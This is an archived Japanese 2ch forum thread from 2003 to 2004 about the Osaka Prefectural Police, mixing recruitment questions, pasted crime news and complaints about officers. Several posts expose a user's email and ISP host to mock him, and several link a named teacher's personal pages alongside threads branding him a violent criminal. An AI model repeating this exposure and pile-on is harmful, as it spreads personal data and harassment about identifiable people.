5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大阪府警 Part 1

1 :名無しピーポ君:03/10/25 21:49
大阪府民880万人を2万人で守ります。
採用選考については該当スレでお願いします。

2 :名無しピーポ君:03/10/25 21:49
採用選考についてはこちらでお願いします。

★大阪府警採用選考 総合スレ Part 9
http://society.2ch.net/test/read.cgi/police/1066388378/

3 :名無しピーポ君:03/10/25 21:50
大阪府警察
http://www.police.pref.osaka.jp/

4 :名無しピーポ君:03/10/25 21:53
大阪府公安委員会
http://www.osakafu-kouaniinkai.jp/


5 :名無しピーポ君:03/10/26 14:47
現本部長はどなたでしょうか?

6 :名無しピーポ君:03/10/26 23:16
太田房江、磯村隆文、鎌原俊二
「川へは決して飛び込まないよう、くれぐれもお願いします。」
とのことです。

7 :名無しピーポ君:03/10/26 23:30
飛び込んじゃダメ!でも、いるんだろうな。

8 :名無しピーポ君:03/10/27 19:01
移動してください。


★大阪府警採用選考 総合スレ Part 9
http://society.2ch.net/test/read.cgi/police/1063218370/

9 :名無しピーポ君:03/11/04 07:22
阪神優勝パレードに65万人

雨の御堂筋に惜別の星野コール。
18年ぶりのセ・リーグ優勝を果たした阪神の優勝パレードが3日、
大阪・御堂筋と神戸で行われた。
雨の中、御堂筋40万人、神戸25万人(主催者発表)が詰めかけ、
計65万人の人出は史上最大となった。
御堂筋パレードは阪神で初めてで、神戸でも62年以来の
優勝パレードに万歳、歓声、拍手に沸いた。
最後のタテジマ姿となった星野仙一前監督(56)=オーナー付
シニアディレクター=には、ひときわ大きな歓声が飛び交った。
(スポーツニッポン)

お疲れ様でした。


10 :名無しピーポ君:03/11/07 15:01
大阪府警本部の課長クラスの階級は何でつか?

11 :名無しピーポ君:03/11/07 17:20
頸部です。

12 :名無しピーポ君:03/11/07 17:25
本部の課長は軽視です

13 :名無しピーポ君:03/11/07 17:26
軽視です

14 :GET、K野:03/11/09 02:18
大阪府警は腐っとる!
奴らに人権も糞もないわなぁ
ホンマ最近、頭にくること多いんよ!

15 :名無しピーポ君:03/11/12 23:32
大阪府警堺東署の交番勤務の巡査長(41)が、勤務中に拾った1万円札を知人の女性に渡し、
警察署に届け出させていたことがわかり、府警監察官室は12日、内部規則に違反したとして、
巡査長を減給100分の10(3か月)の懲戒処分にした。

同室の調べでは、巡査長は9月6日、堺市東上野芝町をバイクで移動中、1万円札が落ちているのを見つけた。
遺失物法では届け出から一定期間、落とし主が現れなければ所有権は拾った人のものになるが、
府警の内部規程などでは、勤務中の警察官は原則として所有権を放棄することとなっている。
巡査長は8日、知り合いの女性に「届け出て持ち主が現れなければ、お前がもらっとけ」と言って1万円札を渡し、
女性の自宅近くの警察署に届け出させた。

しかし、女性は、拾得届の氏名、住所に巡査長の名前を書いたため、巡査長が拾ったことがわかった。
巡査長は「安易に考えていた」と話しているという。

読売新聞
http://www.yomiuri.co.jp/national/news/20031112ic27.htm

16 :名無しピーポ君:03/11/13 22:55
大阪府警にとっては江本の出馬は良いことなのかな?
太田は警察官を増やそうとしているんだっけ?

17 :名無しピーポ君:03/11/26 07:26
警察官の大増員を財務省が容認、犯罪増やテロ対策で

財務省は25日、治安回復のために、来年度から警察官の
大幅増員を認める方針を明らかにした。
財政制度等審議会(財務相の諮問機関)が26日まとめる
来年度予算に関する建議(意見書)に増員を認める方針を明記し、
警察庁から要求があった4500人の増員の大半を認める方向で
調整に入る。
テロの脅威や増加する犯罪に備えるため、地域の警察力を
増強して対抗することが不可欠と判断した。
警察庁は2002年度から3年間で警察官を1万人増やす
計画を進めてきたが、来年度はこれに並行して、さらに3年間で
1万人を増員する新計画を始める。
来年度は旧計画の最終年度として1500人、新計画の初年度として3000人、計4500人の採用を求めている。
財政審は「地方警察官の一定の増員は必要」と明記し、基本的に増員の必要性を認める。ただ、同時に管理部門の警官をできるだけ現場に振り向けて警察機構の合理化を一層進めること、警官以外の地方公務員は大幅に減らすことなども求める。
新たな1万人増員計画については「増員効果の検証が必要」(主計局)として、2005年度以降の増員は、これまでの増員が犯罪をどの程度抑止したか、などを見て決める。



18 :あぼーん:あぼーん
あぼーん

19 :あぼーん:あぼーん
あぼーん

20 :名無しピーポ君:03/12/01 08:15
関age

21 :名無しピーポ君:03/12/02 14:06
大阪本部から各局〜

22 :名無しピーポ君:03/12/02 17:12
大阪109より大阪本部〜

23 :名無しピーポ君:03/12/05 22:13
忘年会か?「


24 :あぼーん:あぼーん
あぼーん

25 :あぼーん:あぼーん
あぼーん

26 :あぼーん:あぼーん
あぼーん

27 :あぼーん:あぼーん
あぼーん

28 :あぼーん:あぼーん
あぼーん

29 :名無しピーポ君:03/12/14 04:52
大阪 最高


30 :名無しピーポ君:03/12/14 09:28
大阪府警内の各署で可愛い又は美人の受け付けや婦警が見れるところ教えてくれ


31 :名無しピーポ君:03/12/14 09:37
>>30
自分で行って見てこいや。

32 :名無しピーポ君:03/12/15 03:01
これも埋めていこうよ!

33 :名無しピーポ君:03/12/15 03:19
埋めよ埋めよ!

34 :名無しピーポ君:03/12/15 03:24
終わってますね、このスレ。

35 :名無しピーポ君:03/12/15 03:36
ほんまや〜

36 :名無しピーポ君:03/12/15 10:36
自作自演キモすぎ

37 :名無しピーポ君:03/12/15 14:14
30
そやな、まずは大淀警察署の免許更新の時にかわいい婦警さんいたぞ。
多分25前後。

38 :名無しピーポ君:03/12/15 14:44
>>37
マジ!?言って抜いてこよっと!

39 :名無しピーポ君:03/12/15 15:35
米総領事館の前にいる人も大変だね。

40 :名無しピーポ君:03/12/15 21:08
岸和田にめちゃカワイイのが受け付けか印紙売り場にいてるらしい

41 :名無しピーポ君:03/12/16 11:37
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

42 :名無しピーポ君:03/12/17 02:51
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll



43 :名無しピーポ君:03/12/17 10:43
今大阪府警にキャリア組の人は何人くらいいますか?

44 :名無しピーポ君:03/12/17 15:13
大阪府警にはキャリア組は8人いる。
警察署の所長も含めてな。

45 :名無しピーポ君:03/12/17 23:54
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll



46 :名無しピーポ君:03/12/19 04:14
      ███▄
       ███▀     █████████
      ███▀ ██  ███▀ ▄███▀
     ██▀ ▄███▀███▄▄▄███
   ▄███▄▄██▀ █▀  ▀████
   ▀▀▀▀███▄      ▄██▀█▄▄
      ██▀ ███   ██▀  ▀███▄▄
    ▄████▀▀██ ▄█▀▄▄    ▀█████▄▄
    ▀█▀▀  █▄▄█▀   ████▄  ▀███▀▀▀
  ▄   ███ ▀███      ▀▀▀
  ███  ███  ▀▀
   ███  ▀        ▀████▄
    ▀              ▀████



47 :名無しピーポ君:03/12/21 02:42

【社会】「建国義勇軍」「国賊征伐隊」聴取の男性が自殺 淀川
http://news5.2ch.net/test/read.cgi/newsplus/1071940610/

48 :みんな死んで:04/01/06 16:51
死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死
死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死
死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死死
死死死死死死死死死死死死死死死死死死死死死死死

49 :受験生(じゅけんなま):04/01/06 22:04
明日、大阪の年頭視閲式があるらしいのですが、何時からどこであるかご存知ですか??
ぜひ教えてください。

50 :名無しピーポ君:04/01/07 00:44
明日、7日じゃないの?
多分、城公園じゃないかな?(私の予想・・・)
万博ではないみたいです。

51 :名無しピーポ君:04/01/11 16:47
大阪府内の警察署でどこが大きな警察署に該当するのかな?

52 :名無しピーポ君:04/01/11 20:14
>>51
枚方警察署

53 :名無しピーポ君:04/01/11 20:28
警察本部の新築、いつ頃できるんかな?

また、一般の見学とかできますでしょうか?

54 :名無しピーポ君:04/01/11 22:36
>>53
こっちは過疎スレだから
http://society.2ch.net/test/read.cgi/police/1071700469/
こっちで聞いてみ。

55 :名無しピーポ君:04/01/12 00:07
枚方警察署は署員だけで六万人いる

56 :名無しピーポ君:04/01/12 06:57
>>54
さんきゅ

57 :名無しピーポ君:04/01/26 16:13
岸和田の中三長男を虐待・餓死未遂案件捜査は捜査一課長(警視正)指揮?
岸和田署長、捜査一課管理官なの?


58 :名無しピーポ君:04/01/28 04:52
大阪府警の中でサイバーポリスにあたる仕事をするのは
情報処理職でいいのですか?

> − 職 務 内 容 −
> コンピュータシステムの構築、情報処理等の業務に従事します。

なんか警察内部のネットワークとかシステム関係の仕事っぽいのですが・・・?

59 :名無しピーポ君:04/01/28 14:21
自己レス
>58
ハイテク犯罪捜査官でした

60 :名無しピーポ君:04/01/28 17:25
施設管理員の採用案内を見たけど、仕事はきついのかな?


61 :名無しピーポ君:04/01/28 18:09
>>60
毎日毎日飽きもせず、同じことに粘着してバカ書き込みする引き籠もり
今夜も徹夜ですか?(爆

62 :名無しピーポ君:04/01/30 23:08
「拒食症にしよう」と指示 虐待隠ぺいへ口裏合わせ

大阪府岸和田市で同居していた男性の中学3年の長男(15)に
虐待を加え、意識不明に陥らせたとして、殺人未遂容疑で逮捕
された無職川口奈津代容疑者(38)の息子(15)が府警捜査1課
などの調べに「長男が病院に運ばれた後、母に『拒食症だったこと
にしよう』と持ち掛けられた」と話したことが30日、分かった。
同居していた息子は川口容疑者と長男の実父烏野康信容疑者
(40)=殺人未遂容疑で逮捕=の虐待行為を間近で見ていたこと
から、同課などは捜査を恐れ、早い段階で虐待隠ぺいの口裏合わせ
をしたとみて捜査している。
調べでは、息子は長男搬送直後の岸和田署の事情聴取に
「長男は拒食症」と話した。
しかし、両容疑者が逮捕された後「母親から『長男は拒食症だった
ことにしよう。ご飯を出しても自分からは食べなかったと話せ』と
言われた」と打ち明けた。
[1月30日19時27分更新]

共同通信より


63 :名無しピーポ君:04/02/01 21:49
布施署のパトカーと衝突、男性重傷 追跡中、警官2人もけが

1日午前4時50分ごろ、大阪府東大阪市長田西の市道交差点で、
不審な車を追跡していた布施署のパトカーと東大阪市楠根、
飲食店経営****さん(27)の乗用車が衝突した。
**さんはろっ骨を折るなど重傷だが命に別条はないという。
パトカーを運転していた男性巡査長(30)は足を打撲、
同乗の男性巡査部長(37)は顔に切り傷を負った。
パトカーは車上狙いの容疑者が乗ったとみられる車を追いかけ、
サイレンを鳴らし赤色灯をつけて走っており、同署が詳しい状況
などを調べている。容疑車両は逃走した。

共同通信より

64 :名無しピーポ君:04/02/02 04:04
寝屋川警察の横山ってハゲをやめさせてくれ。
何だあの態度。こっちは被害者で行ってるのに面倒な仕事を増やすなとばかりに説教してくる。
横に犯人いるのに肩入れして俺が悪者扱い。犯人も強気になる。周りの奴らは見て見ぬ振り。
よくあんな奴の下についていられるな寝屋川の警察官どもは。まぁそれが公務員の宿命だがな。
ほんとみじめだ。寝屋川市ってとこは。

65 :名無しピーポ君:04/02/02 07:45

 大阪府警に合格採用された方へ

 大阪府警に合格された方、又はもう受験意思の無い方で、
 去年、又は一昨年にLECの講座大阪府警のスタンダード
 クラスの受講生だった方、不要になったテキスト類買取り
 させて頂きます。捨てるご予定だった方は(私は捨ててし
 まったのですが)譲って頂けませんか?まずは以下までメ
 ール下さい。brb32007@yahoo.co.jp

66 :名無しピーポ君:04/02/02 12:36
警察の方へ質問です。
えーっと、まいにち毎日警察の不祥事が報道されますが
警察内部で道徳教育見たいなのはないのでしょうか?
例えば人を殺すなとか、人を強姦すあるな、とか
人からモノを盗むなとか。ご返事宜しくお願いします。

67 :名無しピーポ君:04/02/02 13:09
>>66
正しい日本語でおながいします。w

68 :鬼検索 ◆ONIoniKkao :04/02/02 16:34
警察[重要削除]
http://qb2.2ch.net/test/read.cgi/saku2ch/1031234922/55-
>自分で書いたが、さすがにやりすぎたと思い、反省しました。

警察[レス削除]
http://qb2.2ch.net/test/read.cgi/saku/1029948946/229
>先ほどのものですが、削除対象はこの発言です。よろしくお願いします。
>>64 名前:名無しピーポ君 :04/02/02 04:04


寝屋川警察署からのお知らせ
http://www.eonet.ne.jp/~neyagawa/main.htm


69 :名無しピーポ君:04/02/02 16:40
police:警察[重要削除]
http://qb2.2ch.net/test/read.cgi/saku2ch/1031234922/55

 55 名前:岡田[velvetskyk@hotmail.com] 投稿日:04/02/02 13:47 HOST:p29fa26.osakac00.ap.so-net.ne.jp New!
  対象区分:[個人・三種]優先削除あり
  削除対象アドレス:
  http://society.2ch.net/test/read.cgi/police/1067086159/l50
  削除理由・詳細・その他:
  自分で書いたが、さすがにやりすぎたと思い、反省しました。
  次からはこういうことないようにしたいです。
  お手数ですが削除のほう、よろしくお願いします。

どの発言だかさっぱりわからん。

70 :名無しピーポ君:04/02/02 16:54
police:警察[レス削除]
http://qb2.2ch.net/test/read.cgi/saku/1029948946/229

 229 名前:岡田[velvetskyk@hotmail.com] 投稿日:04/02/02 13:56 HOST:p29fa26.osakac00.ap.so-net.ne.jp New!
  削除対象アドレス:
  http://society.2ch.net/test/read.cgi/police/1067086159/l50
  削除理由・詳細・その他:
  先ほどのものですが、削除対象はこの発言です。よろしくお願いします。
  64 名前:名無しピーポ君 :04/02/02 04:04

違うスレに「先ほどのもの」って書いてもなぁ(ワラ


71 :名無しピーポ君:04/02/02 16:57
ちなみにこういうレスが付いているんだが?>>64

police:警察[重要削除]
http://qb2.2ch.net/test/read.cgi/saku2ch/1031234922/56

 56 名前:名無しさん[sage] 投稿日:04/02/02 15:43 HOST:64.0.2.79.ptr.us.xo.net
  >>55
  削除ガイドライン以外の理由では受付られませんですよ。あと発言番号の指定もないし。
  http://www.2ch.net/guide/adv.html#saku_guide

せいぜい恥をさらし続けるこった(ワラ

72 :名無しピーポ君:04/02/04 00:59
大阪府警のハイテク捜査ってこんなもの?
やっぱり大阪だな(藁
ダメなやつらはなにをやってもダメ
http://homepage3.nifty.com/cristalart/yahoo1.html

73 :名無しピーポ君:04/02/16 10:59
岡田晒しage

74 :またやってるよ、こいつ(ワラ:04/02/22 11:43
police:警察[重要削除]
http://qb2.2ch.net/test/read.cgi/saku2ch/1031234922/
58 名前:岡田[velvetskyk@hotmail.com] 投稿日:04/02/20 14:27 HOST:p29fa0a.osakac00.ap.so-net.ne.jp New!
 対象区分:[個人・三種]優先削除あり
 削除対象アドレス:
 http://society.2ch.net/test/read.cgi/police/1067086159/64
 削除理由・詳細・その他:
 削除人様、個人への誹謗中傷のため削除をお願いします。
59 名前:削除マシーン ★[] 投稿日:04/02/20 18:23 ID:??? New!
 >>58
 責任に無関係とはいえず事象に対する批判の範囲かと
 区分違いでもありますので放置(二類と判断します)
60 名前:岡田[] 投稿日:04/02/20 19:28 HOST:p29fa0a.osakac00.ap.so-net.ne.jp New!
 対象区分:[個人・二類]優先削除あり
 削除対象アドレス:
 http://society.2ch.net/test/read.cgi/police/1067086159/64
 削除理由・詳細・その他:
 削除人様、改めて個人への誹謗中傷のため削除をお願いします。
 >>59さん
 大変申し訳ございませんでした。これでよろしいのでしょうか?
 このような依頼自体大変恐縮でございます。
61 名前:削除マシーン ★[] 投稿日:04/02/20 20:51 ID:??? New!
 >>60
 批判の範囲のなので残します、放置

75 :またやってるよ、こいつ(ワラ:04/02/22 11:43
62 名前:岡田[] 投稿日:04/02/20 21:37 HOST:p29fa0a.osakac00.ap.so-net.ne.jp New!
 >>59さん 何度も申し訳ございません
 私生活情報
  情報価値が無く、私事のみの情報・第三者の確認できないプライベート情報は、
 個人が完全に特定されなくても、対象者に不利益が発生する可能性があれば、一律削除対象とします
 誹謗中傷
 三種:
  個人を完全に特定する情報を伴っているものは削除対象です。
 この二つには該当すると思いますがいかがでしょうか?
 40さんの引用ですが、公人ではない一般人の個人と特定される記述があります。
 取り返しがつかなくなる前に至急レスの削除をお願い致します。
63 名前:削除マシーン ★[] 投稿日:04/02/20 21:45 ID:??? New!
 >>62
 三種ではなく二類であると申し上げたはずです
 二類のかたですので
 誹謗中傷
  板の趣旨に則した公益性が有る事象・直接の関係者や被害者による
 事実関係の記述・等が含まれたものは削除されません。
 となります、警察板で警察官又は警察職員の相談者への対応に関する書き込みであり
 直接の関係者と思われる書き込みですので削除対象外と判断します
 又勤務に関しての対応の記述がありますので私生活情報ではありません
 以上の理由により、放置します
 これ以上は削除議論板へどうぞ、このスレでの異議申し立ては無視します
64 名前:岡田[] 投稿日:04/02/20 22:09 HOST:p29fa0a.osakac00.ap.so-net.ne.jp New!
 >>63さんへ
 まず、異議申し立てのつもりは全くなかったです。表現が不適切でした。申し訳ございませんでした。
 この説明に至ってようやく理解いたしました。頭の悪さは言うまでもございませんが見捨ててやってください。
 27さんのアドバイスも肝に命じておきます。最後まで付き合っていただいて本当にありがとうございました。

76 :名無しピーポ君:04/02/22 22:27
マラソンは公共の福利に反するぞ! 01/25/2004

マラソンと、地域住民の生活は、どちらが大事なのだ?!
今日、大阪女子マラソンのおかげで、玉造筋を横断できなくなる事態が生じた。
大勢の警備員、警察官がロープを張って横断を阻止する。しかし、ここは生活道路である!
迂回路がないこと自体がおかしいのとちゃうか?誰も疑問を抱かないのか????!!!!
天王寺警察「地域」所属の小南というポリが、クソ生意気なことをヌかしたので、怒鳴り上げた。
        こ  ら  コ  ミ  ナ  ミ  ! 
日本語能力に欠ける者が警官やるな。それよりもなによりも、マラソンを町中でやるな、ええ迷惑じゃ!!!
マラソンは、公共の福利に反する。ほ ん ま に、腹の虫が収まらんワイ、くそ!

77 :名無しピーポ君:04/02/22 22:33
浪速の唄う巨人 パギやん参上!
http://www.fanto.org
掲示板(趙 博のトークセッション)
http://www.plays.jp/bbs/paggie/index.html
日記(>>76の引用元)
http://fanto.org/private/diaryboard.cgi
河合塾英語科講師紹介(写真入り)
http://www.kawai-juku.ac.jp/school/daiju/2003/kinki/ma-15.php?Page=2

【グラップラー】暴力DQN、駅員に切れまくり【パギ】
http://ex2.2ch.net/test/read.cgi/net/1077450487/
【暴力】DQN講師 趙博のスレッド【犯罪】
http://news4.2ch.net/test/read.cgi/news/1077448801/
河合塾の英語講師=趙博
http://www.milkcafe.net/test/read.cgi/kawai/1077436749/
予備校講師やってるけど...その7
http://school.2ch.net/test/read.cgi/edu/1076529796/
予備校講師の痛いHPを挙げるスレ
http://www.milkcafe.net/test/read.cgi/yobikou/1077422998/


78 :名無しピーポ君:04/02/23 06:20
【JOY再臨】DQN講師、駅員に暴行 3曲目【河合塾】
http://ex2.2ch.net/test/read.cgi/net/1077467751/

79 :名無しピーポ君:04/02/26 06:36
【最強JOY】DQN講師、駅員に暴行 5曲目【差別上等】
http://ex2.2ch.net/test/read.cgi/net/1077729330/
【河合塾講師】趙博、JR職員暴行実践講義第4回【JOYより悪質】
http://news4.2ch.net/test/read.cgi/news/1077629500/
【2ch最大の】趙博、JR職員暴行実践講義【祭!】
http://human2.2ch.net/test/read.cgi/ms/1077696804/
【人と話が】在日韓国人バギやんの日記【したい】
http://ex2.2ch.net/test/read.cgi/korea/1077549132/

80 :名無しさん:04/02/26 14:25
女子トイレ内盗撮で兵庫医科大学脳神経外科医師逮捕−兵庫

・兵庫県の阪急宝塚駅で、兵庫医科大学脳神経外科講師 蒲 恵蔵 容疑者(56)を女子トイレ内を隠し撮りしたとして、同県迷惑防止条例違反の疑いで逮捕した。
 調べによると、蒲 容疑者は2月14日23時頃ごろ、阪急宝塚駅の女子トイレで、個室内をかばんに入れた小型カメラで撮影しているのを駅員に発見された。
同容疑者は容疑を認め
「新しい若い教授になって職場に居づらくなってストレスがたまっていた。犯行を重ねていくうちに罪悪感がなくなってきた」と供述している。
警察では勤務先の兵庫医科大学や自宅などを家宅捜索し、ビデオテープやカメラ機材10数点を押収し、余罪が相当数ある可能性もあるとみてさらに捜査を進めている。

同容疑者は昭和48年京都大学医学部を卒業し現在は兵庫医科大学脳神経外科講師で病棟医長。

兵庫医大は「誠に遺憾である。事実関係を確認し、厳正に対処する。」とコメント。

http://www.hyo-med.ac.jp/department/nsrg/stuffpage.htm


81 :名無しピーポ君:04/03/14 19:08
保守

82 :名無しピーポ君:04/03/18 07:15
 

83 :名無しピーポ君:04/03/23 22:49
http://page.freett.com/kamapat/

大阪府警はヤクザか?
すごすぎる…

84 :名無しピーポ君:04/03/27 00:27
大阪府警察学校を卒業した方に質問なんですが、在学中の靴下の色は決まってますか?
決まっている場合、自室用のものも制限されているのでしょうか。(色が規定外の靴下は持ち込むことすらできないのですか?)
どなたか教えてください

85 :名無しピーポ君:04/03/27 00:58
>>84
スレの流れを少しは見ろよ。ここは明らかに違うってわかるだろ。
こっちに行け。
http://society.2ch.net/test/read.cgi/police/1079002891/

86 :名無しピーポ君:04/03/27 09:16
すみませんご誘導ありがとうございました

87 :名無しピーポ君:04/04/12 17:14
 

88 :名無しピーポ君:04/04/14 23:35
 

89 :名無しピーポ君:04/04/16 20:39
ハンナンの浅田に逃げられた大阪府警
捜査情報漏洩の可能性が大ですね

90 :「食肉業界ドン」に捜査のメス:04/04/16 23:03
「食肉業界のドン」と呼ばれる「ハンナン」の浅田満元会長(65)の牛肉偽装疑惑に16日早朝、ついに捜査のメスが入った。

「聊娯(りょうご)亭」(大阪府羽曳野市)と呼ばれる元会長の大邸宅に、大阪府警の捜査員が続々と到着。
輸入牛肉で築いた資金力をバックに、政界、芸能界から裏社会にまで強い影響力を持つフィクサーで、
暴力団など“闇の勢力”との関係も取りざたされる浅田元会長だが、
グループの経営陣トップを親族でがっちりと固めるなどして、その実像には謎も多い。

01年9月に最初のBSE(牛海綿状脳症)感染が発覚、BSE騒動が始まった。
国は市場に流通した国産牛肉の買い上げ制度を打ち出したが、行政の対応の甘さの裏をかくように、
02年1月、大阪府柏原市の焼却場で大量の牛肉が“焼却処分”された。
農水省が焼却ストップを指示したのは同月末。浅田元会長が役員を務める
「大阪府同和食肉事業協同組合連合会」(府同食)は「すでに焼却処分した」と1000トン
を超える牛肉の買い取りを申請し、その量のケタ違いの多さに、当初から“偽装”の疑いが持たれていた。

強制捜査のニュースに羽曳野市の福谷剛蔵市長は「ハンナンは地域と食文化に発展に寄与している企業で、
強制捜査はびっくりしている」と話した。問題の肉の焼却処分の時、福谷市長は焼却場を運営する事務組合
の管理者の立場にあり、「国と府からの指示に従って焼却しただけだ」と説明した。

毎日新聞 より引用。

91 :名無しピーポ君:04/04/17 00:47
食肉卸大手「ハンナン」元会長の浅田満・府肉連副会長(65)は
同日早朝、大阪府羽曳野市の自宅を車で出た後、所在がわからなくなっており、
府警は代理人を通じて出頭を要請しているという。
また、府肉連側が国産に偽装した外国産牛肉は、約九十トンにのぼることも、
わかった。

92 :名無しピーポ君:04/04/17 06:40
ふ○えやム○オを子分にできるような人なんだから情報は漏れ漏れだろうね。
それでも逮捕しようとしているんだからすごいなあ。
あとは偽装牛肉以外の余罪があるかないかかな?

93 :名無しピーポ君:04/04/17 12:15
浅田はまだ捕まらないが
捜査情報を漏洩したのは府庁でしょう

94 :名無しピーポ君:04/04/18 07:51
牛肉偽装の中心人物?大阪府肉連の浅田副会長を逮捕

 国の国産牛肉買い上げ事業をめぐる「大阪府食肉事業協同組合連合会」(府肉連)の牛肉偽装事件で、
大阪府警捜査2課は17日、府肉連副会長の浅田満容疑者(65)(大阪府羽曳野市)を詐欺容疑で逮捕した。

 浅田容疑者は食肉卸大手「ハンナン」(本社・大阪市中央区)元会長で、府肉連の運営を実質的に取り仕切っており、
府警は偽装事件の中心人物とみて追及する。
また、府警は同日までに、浅田容疑者が専務理事を務める別の業界団体
「全国同和食肉事業協同組合連合会」(全同食)事務長の橋本正寿容疑者(60)らも含め、逮捕状を取っていた11人全員を逮捕した。
調べでは、浅田容疑者らは共謀し、府肉連が羽曳野市食肉事業協同組合などを通じて、
熊本市の肉製品製造会社「ミート丸真」から仕入れた外国産加工牛肉94・5トンを未加工の国産牛肉に偽装。
2001年12月、事業主体の業界団体「全国食肉事業協同組合連合会」(全肉連)に偽装分を混ぜた計573トンを買い上げ申請、
代金約6億3800万円を詐取した疑い。

 橋本容疑者は「浅田容疑者の指示を受けてその通りしました」と、浅田容疑者の関与を認める供述をしているという。
全同食は全肉連から業務委託を受けていた。

読売新聞より引用

95 :名無しピーポ君:04/04/18 07:55
浅田容疑者、パワーの源は「苦労人の商魂」

「食肉のドン」、ついに逮捕――。BSE(牛海綿状脳症)対策の国産牛肉買い上げ制度を悪用した牛肉偽装事件で、大阪府食肉事業協同組合連合会(府肉連)の幹部ら11人が17日までに大阪府警捜査2課に詐欺容疑で逮捕された。
中心的役割を果たしたのは、政界などに太いパイプを持つ府肉連副会長、浅田満容疑者(65)。その素顔を探った。

浅田容疑者は同府羽曳野市生まれ。地元の中学を出て父親の食肉販売業を手伝った。67年に阪南畜産浅田商店を設立。安価な輸入肉に目をつけ、オーストラリアのチルドビーフ(冷蔵肉)などを積極的に取り扱った。
「硬い輸入肉なんて日本人には受けないと最初はばかにしていた」と同市の老舗の食肉業者は言うが、外食産業の普及の波に乗った。「食生活の変化を敏感にキャッチしたのが彼のすごいところだ」と商売人としての勘の良さに舌を巻く。
輸入肉で蓄えた資金力をバックに、50社を超す多業種の企業を傘下に置くグループの総帥の地位を築いた。民間信用調査会社によると、中核企業「ハンナン」(大阪市中央区)だけで売り上げは1400億円に上る。
農相を務め、農水族の大物だった故中川一郎氏が浅田容疑者とじっこんだったことはよく知られる。北海道のグループ関連会社幹部は「売れない輸入肉を抱えて政府が困っていた時、浅田さんはリスク承知で肉を引き受けた。
これで中川さんに恩を売った」。輸入肉は利幅が大きく、需要の高まりとともに“金のなる木”に変わった。
87年、畜産振興事業団(当時)の幹部に輸入牛肉の割当量拡大などを依頼し、現金600万円を渡したとして贈賄容疑で警視庁に逮捕された。
裁判で懲役2年、執行猶予5年の判決を言い渡された時、「重過ぎるんじゃないですか」と叫び、裁判長を驚かせた。
浅田容疑者のパワーの源は「苦労人の商魂」にある。地元の知人が「お金はもう十分あるでしょう」と休養を勧めると、浅田容疑者は穏やかに答えた。
「いやいや、わしはまだ1円のためにだって頭を下げますよ」

毎日新聞より引用

96 :名無しピーポ君:04/04/29 15:48
俺は33歳の警部補なんだけどさ。
50歳までに警視正にと意気込んでたけど無理そう。
あと17年で3階級アップ・・・。無理や。


97 :名無しピーポ君:04/04/29 19:41
>>96
> 俺は33歳の警部補なんだけどさ。
出世しすぎ。w

98 :96:04/04/29 23:16
そうでしょ。
でもね、俺の考えではそうでもない。
だってノンキャリで一番を目指してますから。
最速で33歳警部(まあないけど)だし。

99 :名無しピーポ君:04/05/01 12:21
最速なんてありえないんだよバカ

100 :名無しピーポ君:04/05/01 14:43
大阪府警の生え抜きでどこまで上り詰める事までできるのでしょうか?

101 :名無しピーポ君:04/05/02 09:40
>>101
エクシタシー

102 :名無しピーポ君:04/05/04 22:41
>>101
スマソ、禿ワロタw

103 :名無しピーポ君:04/05/07 01:35
宅間巡査は朝昼晩と警察板見張り続けているだけが仕事かね?

104 :名無しピーポ君:04/05/07 18:30
今日、意味不明にポリに止められました。
止めた理由を聞くと「おまえシートベルトしてなかったやろ!」と怒鳴られ
シートベルトをしていた私にとっては身に覚えもなく、「あんたの目は節穴か?見ろ!してるやないけ!!」と言うと、
「そこで(シートベルト)したやろ」と言われ運転し始めからしていた私は
「はぁ?」と言い返しました。
しかも警官はたくさんおり、俺がシートベルトをしていないと言い張ったの警官は
1人だけ。確認を取らすと「してましたよ」と言う警官もいました。
その後、ゴネまくったら「いってよし」みたいな事を言うから「おまえ!俺を疑っといて謝らんのか!!」と言ってキレました。
結果、警官1人謝らせましたが、「新聞投書するから、念書書け!!」と言ったら、さすがにもう一人警官が来て
「もうええ、はよいって」と言われ、その場を立ち去りました。
疑って止めるのは結構だが、ちゃんと確認とってから止めろよ!!
あんたらの仕事やろ!!しかも肯定的に「したやろ」ってどういうことやねん!!
警察!!何もしてない俺を止めるよりも友達の盗難された車と犯人を探せよ、アホウ!!
と感じました。
そんな警察はいってよし?




105 :名無しピーポ君:04/05/07 20:09
次の方どうぞ〜

106 :名無しピーポ君:04/05/07 20:19
あした大阪府警受ける人手あげなー

107 :名無しピーポ君:04/05/07 20:21
>>106
     | |
    ノ__丶 ∧,,∧      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ||ヤ|| (〃´Д`)_ <  ま、また来年だな。
     ||ケ||/    .| ¢、 \
  _ ||ザ||| |  .    ̄丶.)    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  \ ||ケ||L二⊃ . ̄ ̄\
  ||\`~~´  (<二:彡) \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
   .  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||

108 :名無しピーポ君:04/05/07 20:54
>>106
スレ違い
大阪府警察官採用選考 総合スレ Part 15
http://society.2ch.net/test/read.cgi/police/1083667676/

109 :名無しピーポ君:04/05/08 07:01
いよいよ!

110 :名無しピーポ君:04/05/08 20:47
つーか 落書きとか浮浪者マジ多いね!! 大阪
名古屋や東京いったことあるけどあんなにひどくなかったぞ


111 :名無しピーポ君:04/05/09 19:40
東京が一番ひどい

112 :名無しピーポ君:04/05/16 18:30
